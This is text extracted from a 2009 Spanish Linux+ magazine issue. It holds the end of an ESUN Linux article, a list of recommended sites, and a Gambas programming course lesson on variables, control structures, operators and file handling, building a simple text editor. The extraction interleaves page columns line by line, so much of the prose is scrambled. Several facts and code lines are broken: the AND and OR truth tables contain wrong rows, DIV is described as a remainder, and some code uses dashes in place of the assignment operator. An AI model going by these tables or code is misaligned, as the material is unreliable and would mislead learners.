• Abiword (http://www.abisource.com/);
• Gnumeric (http://projects.gnome.org/ • GIMP (http://www.gimp.org/).
gnumeric/).
Se debe destacar que la gran mayoría de las
En caso de necesitar una solución más ex- aplicaciones de gestión de empresas inclui-
tensa puedes instalar OpenOffice (http://es. das en ESUN Linux son basadas en Web.
openoffice.org), para lo cual abres una termi- Esto implica que al usarlas necesitemos
nal y ejecutas el siguiente comando: que estén funcionando el servidor Web y el
gestor de base de datos (ambos también in-
sudo aptitude install cluidos). Se han agregado dos pequeñas
openoffice.org aplicaciones que inician y detienen estos ser-
openoffice.org-help-es vicios con el fin de evitar el consumo inne-
language-support-es cesario de recursos.
En este artículo hemos visto un caso
Bases de Datos práctico que muestra como se utiliza Linux,
Si bien los motores de bases de datos inclui- y el Software Libre en general, en la for-
dos tienen como objetivo principal servir mación de profesionales de la gestión de
a otros programas de esta lista, también es empresas y como también puedes usar esas
posible interactuar con ellos directamente mismas herramientas para tus iniciativas per-
mediante el uso de herramientas de línea de sonales.
comandos y gráficas presentes en el sistema: Finalmente para chequear nuevas versio-
nes del sistema y obtener mayor información
• MySQL (http://www.mysql.com/); puedes consultar el sitio web: www.esunlinux.
• Postgresql (http://www.postgresql.com); com y/o escribir a: admin@esunlinux.com.
Linux+ 4/2009
Páginas
recomendadas

www.diariolinux.com www.elguille.info www.gatolinux.blogspot.com

www.opensourcespot.org www.hispabyte.net www.linuxdata.com.ar

www.linuxhispano.net www.pillateunlinux.wordpress.com www.usla.org.ar

www.mundopc.net www.picandocodigo.net www.linuxuruguay.org

 programación
Curso de programación en Gambas
Programando
nuestro propio Editor de Texto
Jorge Emanuel Capurro
En esta entrega, veremos las facilidades que nos provee Gambas
para desarrollar un sencillo Editor de Texto. Para ello, daremos
una recorrida sobre los fundamentos del lenguaje BASIC y sus
estructuras, pasando también por el manejo de archivos de disco.
E
n esta segunda entrega del Curso de Progra-
linux@software.com.pl
mación bajo Gambas, nos centraremos en las
estructuras básicas del lenguaje para poder
desarrollar toda la lógica de nuestro programa.
Empezaremos detallando los conceptos y usos de estas es-
tructuras, y finalizando con un ejemplo integrador, el de-
sarrollo de un Editor de Texto. A partir de esta entrega, se
incluirán ejercicios para que el lector pueda seguir practi-
cando y llegar a la próxima entrega del curso un poco más
entrenado. ¡Empecemos!
Variables
Las aplicaciones manejan tipos distintos de datos con-
tinuamente, siendo estos necesarios para poder realizar
operaciones y poder dar un resultado al usuario. Por
ejemplo, en una aplicación que se utilice en un negocio
de venta de ropa, tendríamos la necesidad de tener un
modulo que se encargue de imprimirle una factura al
cliente, detallando la compra que ha realizado. En este
caso, tendríamos que almacenar distintos tipos de datos,
para poder realizar la tarea final. Es decir, tuviéramos que
poder guardar:
72 Linux+ 4/2009
• Fecha de la venta,
• Nombre del cliente,
• Monto de la venta,
• Monto de impuestos.
Una vez obtenido estos datos, nuestro programa se encargará
de sumar el Monto de la venta + Monto de impuestos, para
poder obtener el Monto final, que es el que se le cobrará al
cliente. Todos estos datos se tiene que poder guardar en algún
lado de la memoria del ordenador, para poder volverlos a uti-
lizar, y para ello se utiliza lo que en programación se conoce
como variables.
Una variable no es más que un contenedor, que se encar-
ga de almacenar un valor. Recibe el nombre de variable, ya
que su valor puede ir modificándose -o variando- durante la
ejecución del programa, al contraste de las constantes, que su
valor no puede codificarse durante la ejecución del programa.
Las variables son fundamentales para el desarrollo de un pro-
grama que almacene valores y tenga que realizar operaciones
con ellos. Cabe aclarar que las variables se almacenan en la
memoria del ordenador, y no en el disco rígido, razón por la
cual al apagarla, su contenido se pierde.
 programación
Curso de programación en Gambas

de todo el archivo, como así también dentro

Listado 1. La sintaxis de la estructura IF
de las subrutinas o funciones que este archivo La importancia de la
contenga. Estas variables reciben el nombre de Indentación
IF CondicionVerdadero/ variables globales.
Falso THEN Para declarar una variable local, se utiliza Como buenos programadores, debemos
Código Fuente Gambas la palabra reservada DIM, seguido del tipo de aplicar, en la medida que sea posible,
[ ELSE IF CondicionVerdadero/ dato a almacenar: todas las buenas prácticas de progra-
Falso THEN mación. Una de ellas -creo yo, una de
Código Fuente Gambas DIM NombreVariables las más importantes- es la utilización de
[ ELSE ] AS TipoDato indentación. Se le llama indentación a la
Código Fuente Gambas acción de dejar espacios a la izquierda
ENDIF El tipo de dato especifica qué es lo que se va para identificar claramente cada bloque.
a almacenar en esa variable, es decir, si se va Observa los ejemplos de las estructuras
a almacenar un Nombre (Cadena de Texto), un anteriores. Supongamos que tenemos
Listado 2. La sintaxis te la estructura Teléfono (Número), una Fecha de Nacimiento muchos IF..ELSE anidados. Si el código
SELECT CASE (Fecha). Los tipos de datos posibles en Gambas lo hubiésemos escrito todo alineado a la
se listan en la Tabla 1. izquierda, no se entendería realmente
SELECT Condición Verdadero/Falso La sintaxis de declaración de una variable qué parte de código corresponde a un
[CASE Expresión [TO] Expresión global es la siguiente: bloque en particular, dificultando así
[, Expresión ...] de manera exuberante la claridad y le-
[CASE Expresión [TO] Expresión [STATIC] (PUBLIC | PRIVATE) gibilidad de nuestro código. Piense que
[, Expresión ...] NombreVariables ese mismo código puede ser utilizado
[CASE ELSE | DEFAULT ...] AS TipoDato por un compañero de trabajo, o tal vez,
END SELECT necesitemos modificarlos nosotros mis-
Aquí, la declaración de variables es similar, mos un largo tiempo después. Trate de
Existen dos lugares donde se pueden de- simplemente agregándole el ámbito de varia- ser prolijo y claro al programar, le será
clarar variables en Gambas, dependiendo de ble. El ámbito especifica el alcance que va de suma utilidad.
dónde se vayan a utilizar. Un caso es que se a tener esta variable,es decir, desde dónde se
utilicen en una subrutina o función, siendo que podrá utilizar. Si especificamos a la variable Vale aclarar que en la sintaxis, las sentencias
las variables que se declaren allí servirán y se como PUBLIC, será accesible desde todos los que estén entre corchetes, no son obligatorias.
podrán utilizar solamente en la subrutina o fun- archivos del proyecto. Al cambio, si especifi- Veamos algunos ejemplos de declaración de
ción donde fueron declaradas. Estas variables camos nuestra variable como PRIVATE, solo variables:
reciben el nombre de variables locales. Una podrá ser utilizada en el archivo donde se haya
vez que finaliza la ejecución de la subrutina o declarado. Si este archivo contiene subrutinas • DIM Nombre AS String,
función, estas variables se destruirán automáti- o funciones, también puede ser utilizada allí. • DIM Edad AS Byte,
camente, liberando el espacio en memoria que Por último, el modificador STATIC, se utiliza • DIM Existe AS Boolean,
ocupan. solamente en los archivos de clase, y sirve • PUBLIC FechaNacimiento AS Date,
El otro caso es que las variables se declaren para definir un comportamiento en especial a • PRIVATE Sueldo AS Float.
al comienzo de un archivo de código, como la variable. No entraremos en detalle, ya que
lo es un modulo o clase, por ejemplo. En este no será necesario utilizarla dentro del curso, Hay que notar que la variable Edad ha sido de-
caso, las variables se podrán utilizar dentro y tampoco lo son muy utilizadas a menudo. clarada como tipo de dato BYTE, ya que este da-
to admite valores desde 0 a 255, y es adecuada
Tabla 1. Tabla de los distintos tipos de datos en Gambas
para guardar el valor de la edad de una persona,
Tipo de dato Descripción Tamaño memoria Default
¡ya que no existe ninguna personal que haya
Boolean Valor Booleano – TRUE 1 byte FALSE vivido más de 255 años!
o FALSE
Byte 0 ... 255 1 byte 0 Estructuras de Control
Short -32768 ... +32767 2 bytes 0 Las estructuras de control sirven para alterar el
Integer -2147483648 ... 4 bytes 0 flujo de un programa, dependiendo una condi-
+2147483647 ción dada. Estas estructuras pueden dividirse en
Float Valores con Decimales 8 bytes 0 dos categorías: las estructuras selectivas y las
estructuras iterativas.
Date Fecha/Hora en 4 bytes 8 bytes NULL
enteros cada uno
Estructuras Selectivas
String Referencia a Cadena 4 bytes NULL
Existen dos tipos de estructuras selectivas. La
de Texto
estructura selectiva que más se utiliza en un
Variant Cualquier tipo de dato 12 bytes NULL programa, es la Estructura IF. Esta estructura,
Object Referencia indirecta a 4 bytes NULL evalúa una condición de VERDADERO o FALSO,
un objeto y actúa en consecuencia. Si la clausula ELSE se

www.lpmagazine.org 73
 programación
Curso de programación en Gambas

Las estructuras iterativas las podemos

clasificar en dos categorías: las de Condición
Superior, y las de Condición Inferior.
Condicion
Estructuras iterativas con Condición Su-
perior:

Codigo si es Codigo si es • FOR... NEXT,

Verdadero Falso
• WHILE... WEND.

Estructuras iterativas con Condición Inferior:

Figura 1. Diagrama de la Estructura IF. A la derecha, un Código Fuente de Ejemplo
• REPEAT... UNTIL.

Expresion
de Evaluacion La principal diferencia entre estas dos catego-
Verdadero Condicion
Codigo a Ejecutar rías es que en las Estructuras con Condición
CASE
Inferior, nos aseguramos que por lo menos se
Verdadero Condicion
CASE
Codigo a Ejecutar entre en el bucle una vez, al cambio, en las
Estructuras con Condición Superior no nos
Verdadero Condicion Codigo a Ejecutar
podemos asegurar esto.
CASE
Comencemos por las Estructuras iterativas
Falso
Codigo a Ejecutar con Condición Superior.

Bucle FOR... NEXT

Figura 2. Diagrama de la Estructura SELECT CASE. A la derecha, un Código Fuente de Ejemplo
especifica, se ejecuta el código en caso de que
la condición haya sido evaluada como FALSE.
La sintaxis de la estructura IF está presentada
en el Listado 1.
Para comprender mejor, miremos la Fi-
gura 1, donde se muestra el diagrama de la
estructura IF, y un Código de Gambas ejem-
plo a su derecha.
Por último, la otra estructura selectiva es
la Estructura SELECT CASE. Esta estructura es
de utilidad cuando se necesitan demasiados
niveles de anidamiento del tipo IF/ELSEIF/
ELSE. La sintaxis te la estructura SELECT CA-
SE está presentada en el Listado 2.
Al comienzo de la estructura, se evalúa
la expresión y dependiendo del valor que ésta
contenga, se empiezan a evaluar los CASE
en busca de coincidir con una valor que dé
verdadero. Si ningún valor es verdadero, se
ejecutará el código que se encuentra dentro
Expresion
de Inicializacion
de CASE ELSE. La palabra clave TO especifica
un rango de valores posibles en esa condi-
ción. Las clausulas CASE ELSE y DEFAULT se
utilizan indistintamente. Podemos ver en la
Figura 2 el diagrama de la estructura SELECT
CASE con un código fuente de ejemplo.
Estructuras Iterativas
Estas estructuras nos serán de suma utilidad a la
hora de ejecutar código una cantidad repetidas
veces (a veces conocida y otras veces no). Estas
estructuras tienen una condición de salida de
iteración, sino se ejecutaría el mismo código
infinidades de veces, y caeríamos en lo que
se conoce como bucle infinito, y provocaría
que nuestro programa no terminaría nunca ya
que nunca saldría de ese bucle. Este tipo de
errores es lo que tenemos que evitar a la hora
de programar, ya que son errores que terminan
completamente con el funcionamiento de nues-
tro programa, y se consideran como un error
grave de programación.
Cuando nos sea necesario realizar una acción
un determinado número de veces, la mejor op-
ción es usar un bucle del tipo FOR... NEXT. En
este bucle se le especifica la cantidad de veces
que queremos que se repita el código que está
dentro de él. La sintaxis de la estructura se deta-
lla a continuación:
FOR Variable=ExpresionComiezo TO
ExpresionFin
[STEP ExpresionSalto]
Código Fuente Gambas
NEXT
ExpresionComienzo tiene el valor de comien-
zo de la variable, y la ExpresionFin el valor
de finalización de dicha variable. Para poder
determinar cuántas veces se ejecutará nuestro
bucle, tendremos que realizar la siguiente cuen-
ta matemática:
TotalRepeticioes=
ExpresionFin – ExpresionComienzo

Condicion
de Finalizacion Condicion
de
Premanencia
Codigo a Ejecutar

Codigo a Ejacular

Figura 3. Diagrama de la Estructura FOR... NEXT .

Abajo, un Código Fuente de Ejemplo Figura 4. Diagrama de la Estructura WHILE... WEND . A la derecha, un Código Fuente de Ejemplo

74 Linux+ 4/2009

Tabla 2. Operadores Aritméticos. Num1 y Num2 son variables
Operador Descripción
+ Suma
- Resta
* Multiplicación
/ División
\ Resto de la división
DIV Resto de la división
MOD Resto de la división
INC Incrementa 1
DEC Decrementa 1
Para entender mejor este bucle, contemplemos
la Figura 3.
Si ejecutamos este código fuente, observa-
remos cómo el bucle incrementa de uno en uno
el valor de la variable. Si se llega a agregar el
valor de STEP, el bucle no saltará de uno en uno,
sino que saltará según el valor especificado en
STEP. Por ejemplo, si tenemos el siguiente bu-
cle FOR... NEXT:
FOR Variable=0 TO 10 STEP 2
Código Fuente Gambas
NEXT
La variable en este caso tomará los valores
0,2,4,6,8,10 ejecutándose 6 veces, y no 10
veces como el bucle anterior. En este caso,
nuestra cuenta matemática no nos será de
utilidad.
Bucle WHILE... WEND
Cuando necesitamos ejecutar una porción de
código fuente un número de veces que no son
fijas, es decir, que no lo tenemos especificado
anteriormente, lo mejor es utilizar un bucle
del tipo WHILE... WEND. Supongamos que
tenemos un programa que nos pide que ingre-
semos los datos de los alumnos de una escuela
para guardarlos en una Base de Datos, pero no
sabemos cuántos alumnos son de antemano.
En este caso, utilizaríamos un bucle del tipo
Codigo a Ejacular
Condicion
NOT de
Premanencia
Figura 5. Diagrama de la Estructura REPEAT...
UNTIL . Abajo, un Código Fuente de Ejemplo
Ejemplo
Num1 + Num2
Num1 - Num2
Num1 * Num2
Num1 / Num2
Num1 \ Num2
Num1 DIV Num2
Num1 MOD Num2
INC Num1
DEC Num1
WHILE... WEND, poniendo, por ejemplo, que
el bucle finalice cuando se ingrese el número
de legajo -1 (Inexistente). Vale aclarar que la
condición del bucle es una condición de per-
manencia, es decir, la condición nos especifi-
ca cuándo el bucle se ejecutará y no cuándo
saldrá. Para aclarar mejor esto, veamos el
ejemplo de la Figura 4.
Podemos observar que el diagrama del
bucle WHILE... WEND es similar al de bucle
FOR... NEXT, ya que ambos funcionan de
la misma manera, difiriendo en que el bucle
FOR... NEXT necesita un valor de inicializa-
ción y finalización para poder ejecutarse, lo
que lo convierte en un bucle que se ejecutará
un numero predefinido de veces, por el con-
trario el bucle WHILE.. WEND solamente tiene
la condición por la cual se permanecerá den-
tro del bucle. Para poder entrar dentro de un
bucle WHILE... WEND, en necesario que antes
de entrar, el valor que juega como condición
de permanencia en el bucle sea VERDADE-
RO, de lo contrario nunca se podría ingresar
en el bucle. A modo de ejemplo, supongamos
que la variable Numero esté inicializada de
antermano con el valor 8 antes de entrar al
bucle. Esto daría como resultado un valor
FALSE, ya que 8 no es distinto de 8, y por esa
razón nunca se entraría en el bucle. Vemos en
la Figura 4 el uso de la sentencia INC, la cual
se encarga de sumarle 1 al valor de la variable
que tiene a su derecha, cada vez que se itere.
Estructuras de Control
Selección
IF ... END IF SELECT CASE
FOR... NEXT
Figura 6. Diagrama de las Estructuras de Gambas, según su categoría
www.lpmagazine.org
programación
Curso de programación en Gambas
Más adelante en esta entrega veremos el uso
de INC.
A modo de aclaración global, es necesario
resaltar que para las variables utilizadas en los
bucles solamente pueden ser de tipo entero,
ya que no se puede iterar de 0 a 5,44212, por
ejemplo.
Bucle REPEAT... UNTIL
Este bucle es similar al bucle WHILE...WEND,
con salvedad de que éste se encuentra en la
categoría de Estructuras iterativas con Con-
dición Inferior, teniendo como significado
que un bucle del tipo REPEAT... UNTIL se
ejecutará por lo menos una vez, sin impor-
tar el valor de la variable de condición. Es
importante destacar que el valor de perma-
nencia de la variable tiene que ser un valor
que especifique la negación. Observemos el
diagrama que se encuentra en la Figura 5,
junto al código fuente de ejemplo.
En este código fuente, se ejecuta el bloque
REPEAT... UNTIL mientras que la variable Nu-
mero no sea menor a 8. Cuando la variable tome
el valor 8, se saldrá del bucle. Es por eso que de-
cimos que la condición tiene que tomar un valor
que especifique una permanencia negativa.
A modo de resumen, se deja en la Figura 6,
un diagrama con las estructuras del lenguaje,
según su clasificación.
Operadores
del Lenguaje
Cualquier lenguaje de programación con-
vencional divide a sus operadores en 3 ca-
tegorías: aritméticos, lógicos y relacionales.
Estos operadores nos servirán para poder rea-
lizar operaciones matemáticas, comparar va-
lores, como así también, utilizar expresiones
booleanas.
Como bien su nombre lo indica, los ope-
radores aritméticos tienen la tarea de realizar
operaciones matemáticas. Podemos ver los
operadores aritméticos disponibles en Gambas
en la Tabla 2.
Iteración
Condicion Superior Condicion Inferior
WHILE... WEND REPAT ... UNTIL
75
 programación
Curso de programación en Gambas

Tabla 3. Operadores Lógicos archivos, mediante un ejemplo integrador de

Y (AND) Para obtener una expresión Verdadera, ambos componentes un editor de texto sencillo.
deben ser Verdaderos
VERDADERO VERDADERO VERDADERO Manipulando Archivos
FALSO FALSO VERDADERO El manejo de archivos es un proceso real-
mente sencillo. Simplemente, se remite a tres
FALSO VERDADERO FALSO
pasos:
FALSO FALSO FALSO
O (OR) Para obtener una expresión Verdadera, solo basta que minimamente • Abrir el Archivo,
un componente sea verdadero • Manipular el Archivo (Leer, Escribir, Eje-
VERDADERO VERDADERO VERDADERO cutar, etc),
VERDADERO FALSO VERDADERO • Cerrar el Archivo.
VERDADERO VERDADERO FALSO
FALSO FALSO FALSO Gambas nos provee una rica biblioteca de
funciones para manipular archivos. Las fun-
NO (NOT) Niega el Componente, consiguiendo una expresión contraria a su
ciones más utilizadas podemos visualizarlas
valor
en la Tabla 5. Algunas de estas funciones las
FALSO VERDADERO FALSO
utilizaremos en nuestro editor de texto.
VERDADERO FALSO VERDADERO La forma en que se utilizan estas fun-
ciones la explicaré a continuación, inte-
Tabla 4. Operadores Relacionales. Num1 y Num2 son variables
grando los conceptos vistos anteriormente,
Operador Descripción Ejemplo
programando nuestro editor de texto en
> Mayor que... Num1 > Num2 Gambas.
< Menor que... Num1 < Num2
>= Mayor o Igual que... Num1 >= Num2 ¡A Programar!
<= Menor o igual que... Num1 <= Num2 Empecemos a programar nuestro editor de
texto. Tendrá las funciones básicas de un
<> Distinto Num1 <> Num2
editor de texto, y nos servirá de ejemplo para
= Igual Num1 = Num2
integrar los conocimientos adquiridos hasta
Tabla 5. Funciones para la manipulación de archivos ahora. Repasando los conceptos vistos en la
entrega anterior, diseñaremos la interfaz grá-
Función Descripción
fica de nuestro editor, que será similar a la que
Open/Close Abre/Cierra un archivo
muestra la Figura 7. Como primer paso, ini-
Line Input Lee una línea completa de un archivo ciamos el IDE de Gambas y creamos un nuevo
Read Lee N bytes de un archivo proyecto. A este, le asignamos el nombre que
Write Escribe en un archivo más nos guste.
Access Determina si el archivo puede ser accedido o no Tanto los controles utilizados como las
Eof Determina si se ha llegado al fin del archivo propiedades definidas para el Editor de Texto,
se encuentran en la Tabla 6. Observe que hay
Lof Determina el tamaño en bytes del archivo
propiedades que son iguales para todos los
Exist Determina si el archivo existe o no
controles. Si el lector desea, puede asignarle
IsDir? Determina si un directorio existe o no a los button la propiedad tooltip, que sirve
Stat Retorna información acerca de un archivo para que aparezcan en la pantalla, comenta-
rios acerca de la función del botón cuando
Los operadores lógicos sirven para evaluar operadores arrojan resultados de Verdadero/ se pasa el ratón por encima. Esta propiedad
condiciones booleanas, es decir, expresiones Falso que una estructura de este tipo puede recibe la cadena de texto que quiere que se
que indican Verdadero o Falso. En la Tabla evaluar. Veremos más adelante un ejemplo muestre como comentario. Todas las imáge-
3 podemos visualizar una tabla de la verdad, utilizando estos operadores. nes de los botones han sido extraídas de los
en la que se indican posibles valores y su co- repositorios de imágenes que trae incorpora-
rrespondiente resultado (columna izquierda) Trabajando do Gambas.
aplicadle el operador lógico. con Archivos Ahora bien, empecemos declarando las
Los operadores relacionales, también Sin duda, la mayoría de los programas uti- variables que utilizaremos. Para ello, hace-
conocidos como operadores de comparación, lizan archivos para realizar sus funciones. mos doble clic sobre alguna zona del formula-
sirven para comparar dos valores, arrojando Algunos los utilizan para generar archivos rio (cualquiera), lo cual nos abrirá el editor de
un resultado del tipo booleano (Verdadero o de reporte de errores (logs), otros para alma- código. Una vez allí, nos dirigimos a la barra
Falso). Ver Tabla 4. cenar configuraciones, etc. El manejo de ar- superior del editor de código, y en el cuadro
Tanto los operadores lógicos, como los chivos es una tarea que ningún programador desplegable seleccionamos la opción Decla-
operadores relacionales, suelen utilizarse en en Gambas debe desconocer. Es por ello que raciones. Allí es donde se declaran todas las
estructuras de control selectivas, ya que estos aprenderemos en esta sección a manipular variables que utilizaremos en nuestro formu-

76 Linux+ 4/2009
 programación
Curso de programación en Gambas

En Unix todo es un Archivo

Seguramente habrás escuchado alguna
vez decir a un guru de Unix: En Unix
todo es un Archivo, y no estaba equi-
vocado cuando lo decía. GNU/Linux no
escapa a ese concepto. Tanto las imá-
genes, como los vídeos, o el dispositivo
USB, etc es tratado como un archivo.
Es por ello que, al saber manipular,
por ejemplo, un archivo de texto, es
igual al saber manipular el dispositivo
USB (siempre hablando en términos de
Lectura/Escritura).

de texto, ya que no se puede guardar un ar-

chivo sin antes crearlo. Es por ello que no
están habilitados los controles btnGuardar,
btnGuardarComo y txtEditorTexto . Por
último, nos encargamos de ocultar el botón
Figura 7. Interfaz de nuestro editor de texto ¡Simple pero potente!
btnCerrarArchivo , ya que no nos será ne-
lario. Ver Figura 8. Una vez situados allí, de datos que maneja cada variable, compa- cesario que éste se encuentre en el formula-
declaramos las siguientes variables: rándose y entendiendo el por qué de la elec- rio, por la misma razón que deshabilitamos
ción del tipo de datos, en función de la labor los controles.
PRIVATE Archivo AS File que realizará. Este código fuente es un excelente ejem-
PRIVATE NombreArchivo AS String Comencemos programando nuestros pri- plo de asignación de propiedades en tiempo
PRIVATE RutaArchivo AS String meros eventos. El primero de ello será el de ejecución, es decir, que se realizarán una
PRIVATE ModificoArchivo AS Boolean evento open del FMain que, como su nombre vez que el programa esté corriendo en la
lo indica, se dispara cuando el formulario se PC. Por ejemplo, el botón btnCerrarAr-
Hemos declarado a estas variables PRIVADAS, abre. Escribimos, dentro de él, el Código chivo se muestra en el diseño de nuestro
ya que solo las utilizaremos en el formulario Fuente 1, presentado en el Listado 3. editor de texto, pero una vez ejecutado el
principal, y no en otro. La utilidad de las varia- Pasemos a explicarlo: En primera ins- código, éste desaparece.
bles son las siguientes: tancia, le asignamos un texto a FMain, me- El Código Fuente 2:
diante la propiedad text. Este texto apa-
• Archivo: Esta variable será nuestro des- recerá en la barra de título. Luego, nos en- PUBLIC SUB txtEditorTexto_Change( )
criptor de archivo, es decir, ella almace- cargamos de deshabilitar los controles que ModificoArchivo = TRUE
nará la dirección de dónde se encuentra no son necesarios al iniciar nuestro editor END
el archivo con el que estamos trabajan-
do (o vamos a trabajar). Tabla 6. Propiedades de los controles
• NombreArchivo: Esta variable se encar- Tipo Control Name Height Width Picture
gará de contener el nombre del archivo
Form Fmain 532 735 [Ninguna]
actual.
TextArea txtEditorTexto 721 483 [Ninguna]
• RutaArchivo: Esta variable almacena
el PATH o ruta completa del archivo Button btnNuevo 28 28 New
actual. Nos servirá de referencia para Button btnAbrir 28 28 Open
saber dónde se encuentra ubicado el ar- Button btnGuardar 28 28 Save
chivo. Button btnGuardarComo 28 28 Save-As
• ModificoArchivo: Esta variable se
Button btnDeshacer 28 28 Undo
encargará de almacenar un valor TRUE
Button btnRehacer 28 28 Redo
o FALSE, en caso de que el archivo con el
que estemos trabajando, haya sido mo- Button btnCortar 28 28 Cut
dificado. Button btnCopiar 28 28 Copy
Button btnPegar 28 28 Paste
Es aconsejable y se considera una buena Button btnBloquear 28 28 Lock
práctica de programación, poner nombres Button btnCerrarArchivo 28 28 Close
lo suficientemente descriptivos en las va-
Button btnSalir 28 28 Quit
riables, que por si solas denoten su función
Las propiedades Text de todos los controles están vacías
dentro del programa. Note el lector el tipo

www.lpmagazine.org 77
 programación
Curso de programación en Gambas
Listado 3. Código Fuente 1. Declaración de Variables
PUBLIC SUB Form_Open( )
Fmain.Text = “Editor de Texto”
btnGuardar.Enabled = FALSE
btnGuardarComo.Enabled = FALSE
txtEditorTexto.Enabled = FALSE
btnCerrarArchivo.Visible = FALSE
END
Listado 4. Codigo Fuente 3. Evento Clic del btnNuevo
PUBLIC SUB btnNuevo_Click( )
IF btnCerrarArchivo.Visible = TRUE THEN
Message.Info(''¡Primero debe cerrar el archivo!'')
RETURN
ENDIF
NombreArchivo = InputBox("Nombre del Nuevo Archivo: ", ''Editor de
Texto'')
RutaArchivo = User.Home & ''/'' & NombreArchivo
IF Exist(RutaArchivo) = TRUE THEN
Message.Error(''Nombre de Archivo invalido o existente'')
ELSE
OPEN RutaArchivo FOR CREATE AS #Archivo
Fmain.Text = ''Editor de Texto - '' & RutaArchivo
btnCerrarArchivo.Visible = TRUE
btnGuardar.Enabled = TRUE
btnGuardarComo.Enabled = TRUE
txtEditorTexto.Enabled = TRUE
txtEditorTexto.SetFocus
ENDIF
se encarga de asignar el valor TRUE a la va-
riable ModificoArchivo. Podemos ver que
éste se asigna cuando el evento Change del
control txtEditorTexto. Este evento se
dispara cuando ocurre un cambio dentro del
control, es decir, si se presiona una tecla, o se
modifica alguna palabra del texto, etc. y nos
viene perfecto para la labor que necesitamos
realizar.
Ahora empecemos a trabajar con archi-
vos. Para ello, proseguiremos a codificar el
evento clic del btnNuevo, que se encargará
de pedirnos un nombre de archivo nuevo
y crearlo para que podamos trabajar. Anali-
Figura 8. Sección de Declaración de Variables
78
¡Igualdad de condiciones!
Podemos observar que muchos de los
controles – como así también, métodos
y eventos - tienen valores similares. En
Gambas, se aplica -en mayor medida- la
igualdad de condiciones. Esta igualdad
consiste en que, por ejemplo, si la pro-
piedad text de un determinado control
sirve para asignar texto dentro de él,
los demás controles que también la
tengan cumplan la misma función. Esta
igualdad le hace más sencilla la tarea al
programador, evitando tener que memo-
rizar distintos nombres de propiedades,
según el control que esté utilizando.
asignamos a la variable NombreArchivo con
el valor que es introducido en nuestro Input-
Box. La función InputBox, es utilizada para
que el usuario introduzca un valor, y éste
pueda ser guardado en, por ejemplo, una va-
riable. La llamada a esta función comprende
la siguiente sintaxis:
InputBox
(Descripcion del Mensaje,
Titulo, Texto por Defecto)
En la Figura 9 podemos ver como quedaría
nuestro InputBox, dependiendo de los pará-
metros pasados. Vale aclarar que el InputBox
cemos el Código Fuente 3, mostrado en el
Listado 4. ¿Que es el código ASCII?
En primer lugar, comprobamos mediante
la estructura de selección IF... END IF, si el Los ordenadores solo entienden núme-
btnCerrarArchivo está visible, y de ser así, ros. Para poder representar los caracte-
nos identifica que hay algún archivo abierto res en forma de número se utiliza como
y es por ello que no podemos crear uno nue- estándar el Código ASCII. ¿Quién no
vo. Le avisamos de dicha situación al usuario tuvo alguna vez que apretar Alt+64 para
mediante un MessageBox y luego salimos del introducir el símbolo de arroba (@) en la
evento mediante la sentencia RETURN. Esta pantalla? El código ASCII es una repre-
sentencia se encarga de romper el flujo del sentación numérica de un carácter co-
programa, saliendo de los eventos antes que mo ‘a’ o ‘@’, o también es una represen-
finalicen, aunque también es utilizada en los tación de un carácter de control, como
procedimientos para salir de ellos. Luego, lo puede ser el carácter ENTER. ASCII
es el acrónimo Ingles de American Stan-
dard Code for Information Interchange -
(Código Estadounidense Estándar para
el Intercambio de Información) y posee
una tabla general con todos los valores
de sus números, con sus correspon-
dientes representaciones en carácter.
Podemos obtener una tabla ASCII
simplemente tipeando en la consola el
comando man ascii.
Linux+ 4/2009
 programación
Curso de programación en Gambas

donde se encontrará nuestro archivo de texto.

Listado 5. Codigo Fuente 4. Codificación de los botones btnGuardar y btnGuardarComo
Por cuestiones de simplicidad, todos nuestros
archivos se guardan en el directorio HOME del
PUBLIC SUB btnGuardar_Click( ) usuario que esté logueado en el sistema en ese
Archivo.Save(RutaArchivo, txtEditorTexto.Text) momento, ya que más adelante veremos cómo
END invocar cuadros de diálogo para que el usuario
PUBLIC SUB btnGuardarComo_Click( ) pueda, entre otras cosas, elegir la ruta donde
DIM Nombre AS String quiera guardar su archivo. Una vez generada
Nombre = InputBox(''Ingrese el Nombre del Archivo a Guardar:'') la ruta del archivo, nos encargamos de invocar
IF Exist(User.Home & ''/'' & Nombre) = TRUE THEN a la función Exist (Ver Tabla 5), para verificar
Message.Error(''¡Nombre/Ruta Invalida!'') que no exista un archivo en ese directorio con
ELSE el mismo nombre ingresado por el usuario,
RutaArchivo = User.Home & ''/'' & Nombre porque de ser así, lo podríamos reemplazar ac-
Fmain.Text = ''Editor de Texto - '' & RutaArchivo cidentalmente ¡y tendríamos serios problemas
Archivo.Save(RutaArchivo, txtEditorTexto.Text) con el usuario si éste llegara a perder sus datos
ENDIF por una falla del programador! Si la función
END nos retorna el valor TRUE, la informamos al
usuario y el flujo del programa se dirige al END
Listado 6. Codigo Fuente 5. Codificación del boton btnAbrir IF, y como luego no hay más código, se sale
automáticamente del evento. Supongamos
PUBLIC SUB btnAbrir_Click( ) que el usuario ingresa un nombre de archivo
DIM Linea AS String válido o inexistente, es entonces ahora donde
DIM Nombre AS String el código se encarga de abrir una nueva ruta
IF btnCerrarArchivo.Visible = TRUE THEN que le indicamos (OPEN RutaArchivo) para
Message.Info(''¡Primero debe cerrar el Archivo!'') su creación (FOR CREATE) y lo asociamos
RETURN a nuestra variable Archivo (AS #Archivo) para
ENDIF que actúe como descriptor, para luego poder
Nombre – InputBox(''Ingrese el nombre del Archivo:'') manipularlo mediante esta variable. Una vez
IF Nombre = '' '' THEN finalizado el proceso de creación de archivo,
RETURN nos encargamos de habilitar los botones para
ENDIF que el usuario los pueda utilizar y asignarle
RutaArchivo = User.Home & ''/'' & Nombre un nuevo título a la barra de título de nuestro
IF Exist(RutaArchivo) = TRUE THEN form con la ruta de nuestro archivo, y por úl-
OPEN RutaArchivo FOR READ WRITE AS #Archivo timo, le damos el foco al editor de texto (txt
Fmain.Text = ''Editor de Texto - '' & RutaArchivo EditorTexto.SetFocus) para que el cursor se
btnCerrarArchivo.Visible = TRUE situé automáticamente sobre él.
WHILE NOT Eof(Archivo) Ahora nos dedicaremos a codificar la ac-
LINE INPUT #Archivo, Linea ción de Guardar un archivo. Como todo progra-
txtEditorTexto.Text = txtEditorTexto.Text & Linea & Chr(13) ma convencional, existe la opción de Guardar
WEND y de Guardar Como. Veamos cómo funcionan
btnGuardar.Enabled = TRUE ambas, en el Código Fuente 4 (Listado 5).
btnGuardarComo.Enabled – TRUE Empecemos con el btnGuardar. Como
txtEditorTexto.Enabled = TRUE dijimos, de ahora en más, el encargado de
txtEditorTexto.SetFocus realizar las acciones sobre nuestro archivo es
ELSE nuestro descriptor. Es por ello que accedemos
Message.Error(''¡Archivo Inexistente!'') al método SAVE, donde le indicamos la ruta del
